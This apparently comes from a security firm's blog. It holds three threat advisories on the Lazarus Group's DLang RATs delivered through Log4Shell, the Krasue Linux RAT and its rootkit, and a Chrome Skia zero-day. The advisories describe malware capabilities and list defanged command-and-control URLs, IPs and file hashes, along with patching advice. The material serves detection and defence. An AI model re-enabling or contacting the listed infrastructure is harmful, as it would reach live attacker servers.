North Korea’s Lazarus Group’s DLang-Based RAT Targeting VMWare Horizon Servers via Log4j

by jdpoteet | Dec 14, 2023 | Threat Advisories

North Korea’s Lazarus Group’s DLang-Based RAT Targeting VMWare Horizon Servers via Log4j

SUMMARY

The Lazarus group (North Korea) continues to leverage the Log4Shell vulnerability (CVE-2021-44228) as an opportunity to deploy 3 Dlang-based malware families.

TECHNICAL DETAILS

Cisco Talos identified several attacks that exploited the Log4Shell vulnerability, specifically targeting VMWare Horizon servers publicly exposed and utilizing a Log4j version susceptible to remote code execution (RCE).  Talos named this attack campaign “Operation Blacksmith”, which uncovered 2 new remote access trojans (RATs), NineRAT and DLRAT, along with a malware downloader named BottomLoader.  A noteworthy shift in Lazarus’ tactics is observed, marked by the uncommon use of the D programming language to develop the malware strains, possibly to evade detection:

• NineRAT leverages the Telegram API for command-and-control communication, executing commands and exfiltrating files from compromised systems.
• DLRAT, a trojan and downloader that initiates its activity by collecting system information and sending it to a command-and-control server.
• BottomLoader fetches and executes payloads using PowerShell, establishing persistence, and allowing file exfiltration.

Talos also indicated that Lazarus may share the collected victim data with other APT groups or clusters within its umbrella, based on observed system “re-fingerprinting”.

INDICATORS OF COMPROMISE

SHA256:

HazyLoad

• 000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eee

NineRAT

• 534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433
• ba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4
• 47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30
• f91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59
• 5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541
• 82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def

BottomLoader

• 0e416e3cc1673d8fc3e7b2469e491c005152b9328515ea9bbd7cf96f1d23a99f

DLRAT

• e615ea30dd37644526060689544c1a1d263b6bb77fe3084aa7883669c1fde12f
• 9a48357c06758217b3a99cdf4ab83263c04bdea98c347dd14b254cab6c81b13a

Domains and IPv4:

• tech[.]micrsofts[.]com
• tech[.]micrsofts[.]tech
• 27[.]102[.]113[.]93
• 185[.]29[.]8[.]53
• 155[.]94[.]208[.]209
• 162[.]19[.]71[.]175
• 201[.]77[.]179[.]66
• hxxp://27[.]102[.]113[.]93/inet[.]txt
• hxxp[://]162[.]19[.]71[.]175:7443/sonic/bottom[.]gif
• hxxp[://]201[.]77[.]179[.]66:8082/img/lndex[.]php
• hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/B691646991EBAEEC[.]gif
• hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/7AEBC320998FD5E5[.]gif

RECOMMENDATIONS

• Urgently update and patch the Log4j library on all publicly facing VMWare Horizon servers to address the vulnerability and prevent remote code execution.
• Implement network segmentation to restrict access to critical systems and reduce the attack surface, isolating the VMWare Horizon servers from unnecessary exposure.
• Review and reinforce access controls, ensuring that only authorized personnel have access to critical systems. Employ the principle of least privilege to minimize potential attack vectors.
• Endpoint protection is crucial to thwart the execution of the malware outlined in this advisory.
• Implement web scanning tools to proactively block access to malicious websites and identify malware commonly used in such attacks.
• For email security, deploy solutions to block malicious emails that threat actors may use as part of their campaigns.
• Utilize advanced firewall appliances capable of detecting and mitigating malicious activities associated with emerging threats.
• Leverage malware analytics tools to identify and proactively protect against malicious binaries, integrating robust security across your infrastructure.
• Secure your internet gateway to block connections to malicious domains, IPs, and URLs, regardless of user location.
• Automate web security measures to automatically block potentially harmful sites and assess suspicious sites before user access.
• Enhance protection by leveraging additional security measures tailored to your specific environment and threat data.
• Implement multi-factor authentication solutions to ensure only authorized users access your network securely.

REFERENCES

• https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/
• https://thehackernews.com/2023/12/lazarus-group-using-log4j-exploits-to.html
• https://www.bleepingcomputer.com/news/security/lazarus-hackers-drop-new-rat-malware-using-2-year-old-log4j-bug

Krasue RAT Linux Malware

by jdpoteet | Dec 8, 2023 | Threat Advisories

Krasue RAT Linux Malware

SUMMARY

Krasue is a remote access trojan (RAT) designed for Linux systems, specifically within telecommunications companies in Thailand.  Krasue was identified by security researchers at Group-IB and has been seen successfully evading detection since 2021.  Analyzing the Krasue binary found seven different variants of a rootkit that supports various versions of the Linux kernel.  This RAT appears to be constructed with code derived from three distinct open-source projects.

TECHNICAL DETAILS

Group-IB provided details of their analysis of Krasue, including its primary function of ensuring persistent access to the infected host system.  This persistence may also indicate potential deployment via a botnet or distribution by initial access brokers for threat actors looking for specific targets.   Although the method of distribution remains unclear, potential vectors include exploiting vulnerabilities, credential brute force attacks, or disguising itself as a legitimate product when downloaded from untrusted sources.  Krasue seems to be concentrating its efforts on targeting telecommunications companies in Thailand.

Group-IB’s analysis of the rootkit embedded within the Krasue binary found that it operates as a Linux Kernel Module (LKM), presenting itself as an unsigned VMware driver upon execution and at the same security level as the underlying operating system. The rootkit’s compatibility with Linux Kernel versions 2.6x/3.10.x allows it to go undetected, exploiting the limited Endpoint Detection and Response coverage on older Linux servers. All seven iterations of the embedded rootkit have consistent system call and function call hooking capabilities.  Examination of the code found that Krause is derived from three open-source LKM rootkits—Diamorphine, Suterusu, and Rooty—all of which have been available since 2017.

Capabilities of Krasue include port manipulation, process invisibility, root privilege provision, execution of the kill command for any process ID, and adept concealment of malware-related files and directories.  When communicating with a command and control (C2), Krasue responds to commands that include ping responses, master configuration settings, information retrieval requests, restart and respawn processes, and even self-termination commands.

Group-IB’s investigation found 9 distinct C2 IP addresses hardcoded into the malware, with the address utilizing port 554 that is associated with Real Time Streaming Protocol (RTSP) connections.  The utilization of RTSP for C2 communication adds a distinctive characteristic to Krasue’s behavior.

Though Krasue’s origin is still unclear, researchers have observed overlaps with XorDdos Linux malware, suggesting a potential common author or operator. It is also plausible that the Krasue developer had access to the code of XorDdos.

RECOMMENDATIONS

• Consider reviewing the Group-IB provided indicators of compromise (IOCs) and YARA rules for detection, potentially encouraging collaborative research efforts among the cybersecurity community.
• Implement network traffic monitoring to detect and analyze unusual patterns, especially on port 554, as Krasue utilizes this uncommon approach for communication.
• Strengthen EDR solutions to ensure comprehensive coverage, especially on older Linux servers where Krasue exploits potential vulnerabilities.
• Conduct regular security audits to identify and address vulnerabilities promptly. Implement robust patch management practices to ensure that systems are up-to-date and protected against known exploits.
• Employ behavioral analysis tools and anomaly detection mechanisms to identify suspicious activities, particularly those associated with rootkit functionalities such as process invisibility and port manipulation.
• Enforce multi-factor authentication (MFA) to mitigate the risk of credential brute force attacks, a potential avenue for Krasue’s distribution.
• Educate users about the risks associated with downloading software from untrusted sources, emphasizing the importance of obtaining applications from reputable repositories.

Indicators of Compromise

Hashes:

• 902013bc59be545fb70407e8883717453fb423a7a7209e119f112ff6771e44cc
• b6db6702ca85bc80599d7f1d8b1a9b6dd56a8e87c55fc831dc9c689e54b8205d
• ed38a61a6b7af436120465d352baa4cdf4ed8f01a7db7245b6254353e52f818f
• afbc79dfc4c7c4fd9b71b5fea23ef12adf0b84b1af22a993ecf91f3d829967a4
• 97f08424b14594a5a39d214bb97823690f1086c78fd877558761afe0a032b772
• 38ba7790697da0a736c80fd9a04731b8b0bac675cca065cfd42a56dde644e353
• e0748b32d0569dfafef6a8ffd3259edc6785902e73434e4b914e68fea86e6632
• 4428d7bd7ae613ff68d3b1b8e80d564e2f69208695f7ab6e5fdb6946cc46b5e1
• c9552ba602d204571b9f98bd16f60b6f4534b3ad32b4fc8b3b4ab79f2bf371e5
• 3e37c7b65c1e46b2eb132f98f65c711b4169c6caeeaecc799abbda122c0c4a59
• 8a58dce7b57411441ac1fbff3062f5eb43a432304b2ba34ead60e9dd4dc94831

IP Address(es):

• 199.226[.]11:554

REFERENCES

• https://www.group-ib.com/blog/krasue-rat/
• https://thehackernews.com/2023/12/new-stealthy-krasue-linux-trojan.html
• https://www.bleepingcomputer.com/news/security/krasue-rat-malware-hides-on-linux-servers-using[1]embedded-rootkits

Zero-Day: Google Chrome

by jdpoteet | Nov 29, 2023 | Threat Advisories

Zero-Day: Google Chrome

SUMMARY

Google released security patches addressing 7 Chrome browser vulnerabilities, one is a zero-day being actively exploited. The Zero-Day is CVE-2023-6345, a high-severity vulnerability described as an integer overflow bug within Skia, an open-source 2D graphics library.

VULNERABILITY DETAILS

Google responded to the zero-day vulnerability with an immediate security update ad it is aware of the exploit’s presence in the wild.

The vulnerability is an integer overflow weakness within the Skia open-source 2D graphics library. Potential risks associated with this vulnerability range from system crashes to arbitrary code execution.   Skia is a graphics engine for various products, including ChromeOS, Android, and Flutter.  Discovered on November 24 by Google’s Threat Analysis Group (TAG), this vulnerability follows a pattern exploited by state-sponsored hacking groups in espionage campaigns targeting notable individuals, such as journalists and opposition politicians.

Users are strongly advised to upgrade to Chrome versions 119.0.6045.199/.200 for Windows and 119.0.6045.199 for macOS and Linux to mitigate potential security threats. Additionally, users of Chromium-based browsers, including Microsoft Edge, Brave, Opera, and Vivaldi, are encouraged to promptly apply provided fixes as they become available.

RECOMMENDATIONS

• Users are strongly advised to update Chrome browsers to the latest versions (119.0.6045.199/.200 for Windows, 119.0.6045.199 for macOS and Linux).
• Ensure all devices running Chrome are updated to the latest versions.
• If using browsers like Microsoft Edge, Brave, Opera, or Vivaldi that are based on Chromium, stay informed about security updates for these browsers and apply them as they become available.

REFERENCES

• https://chromereleases.googleblog.com/2023/11/stable-channel-update-for-desktop_28.html
• https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-6th-zero-day-exploited-in-2023/
• https://thehackernews.com/2023/11/zero-day-alert-google-chrome-under.html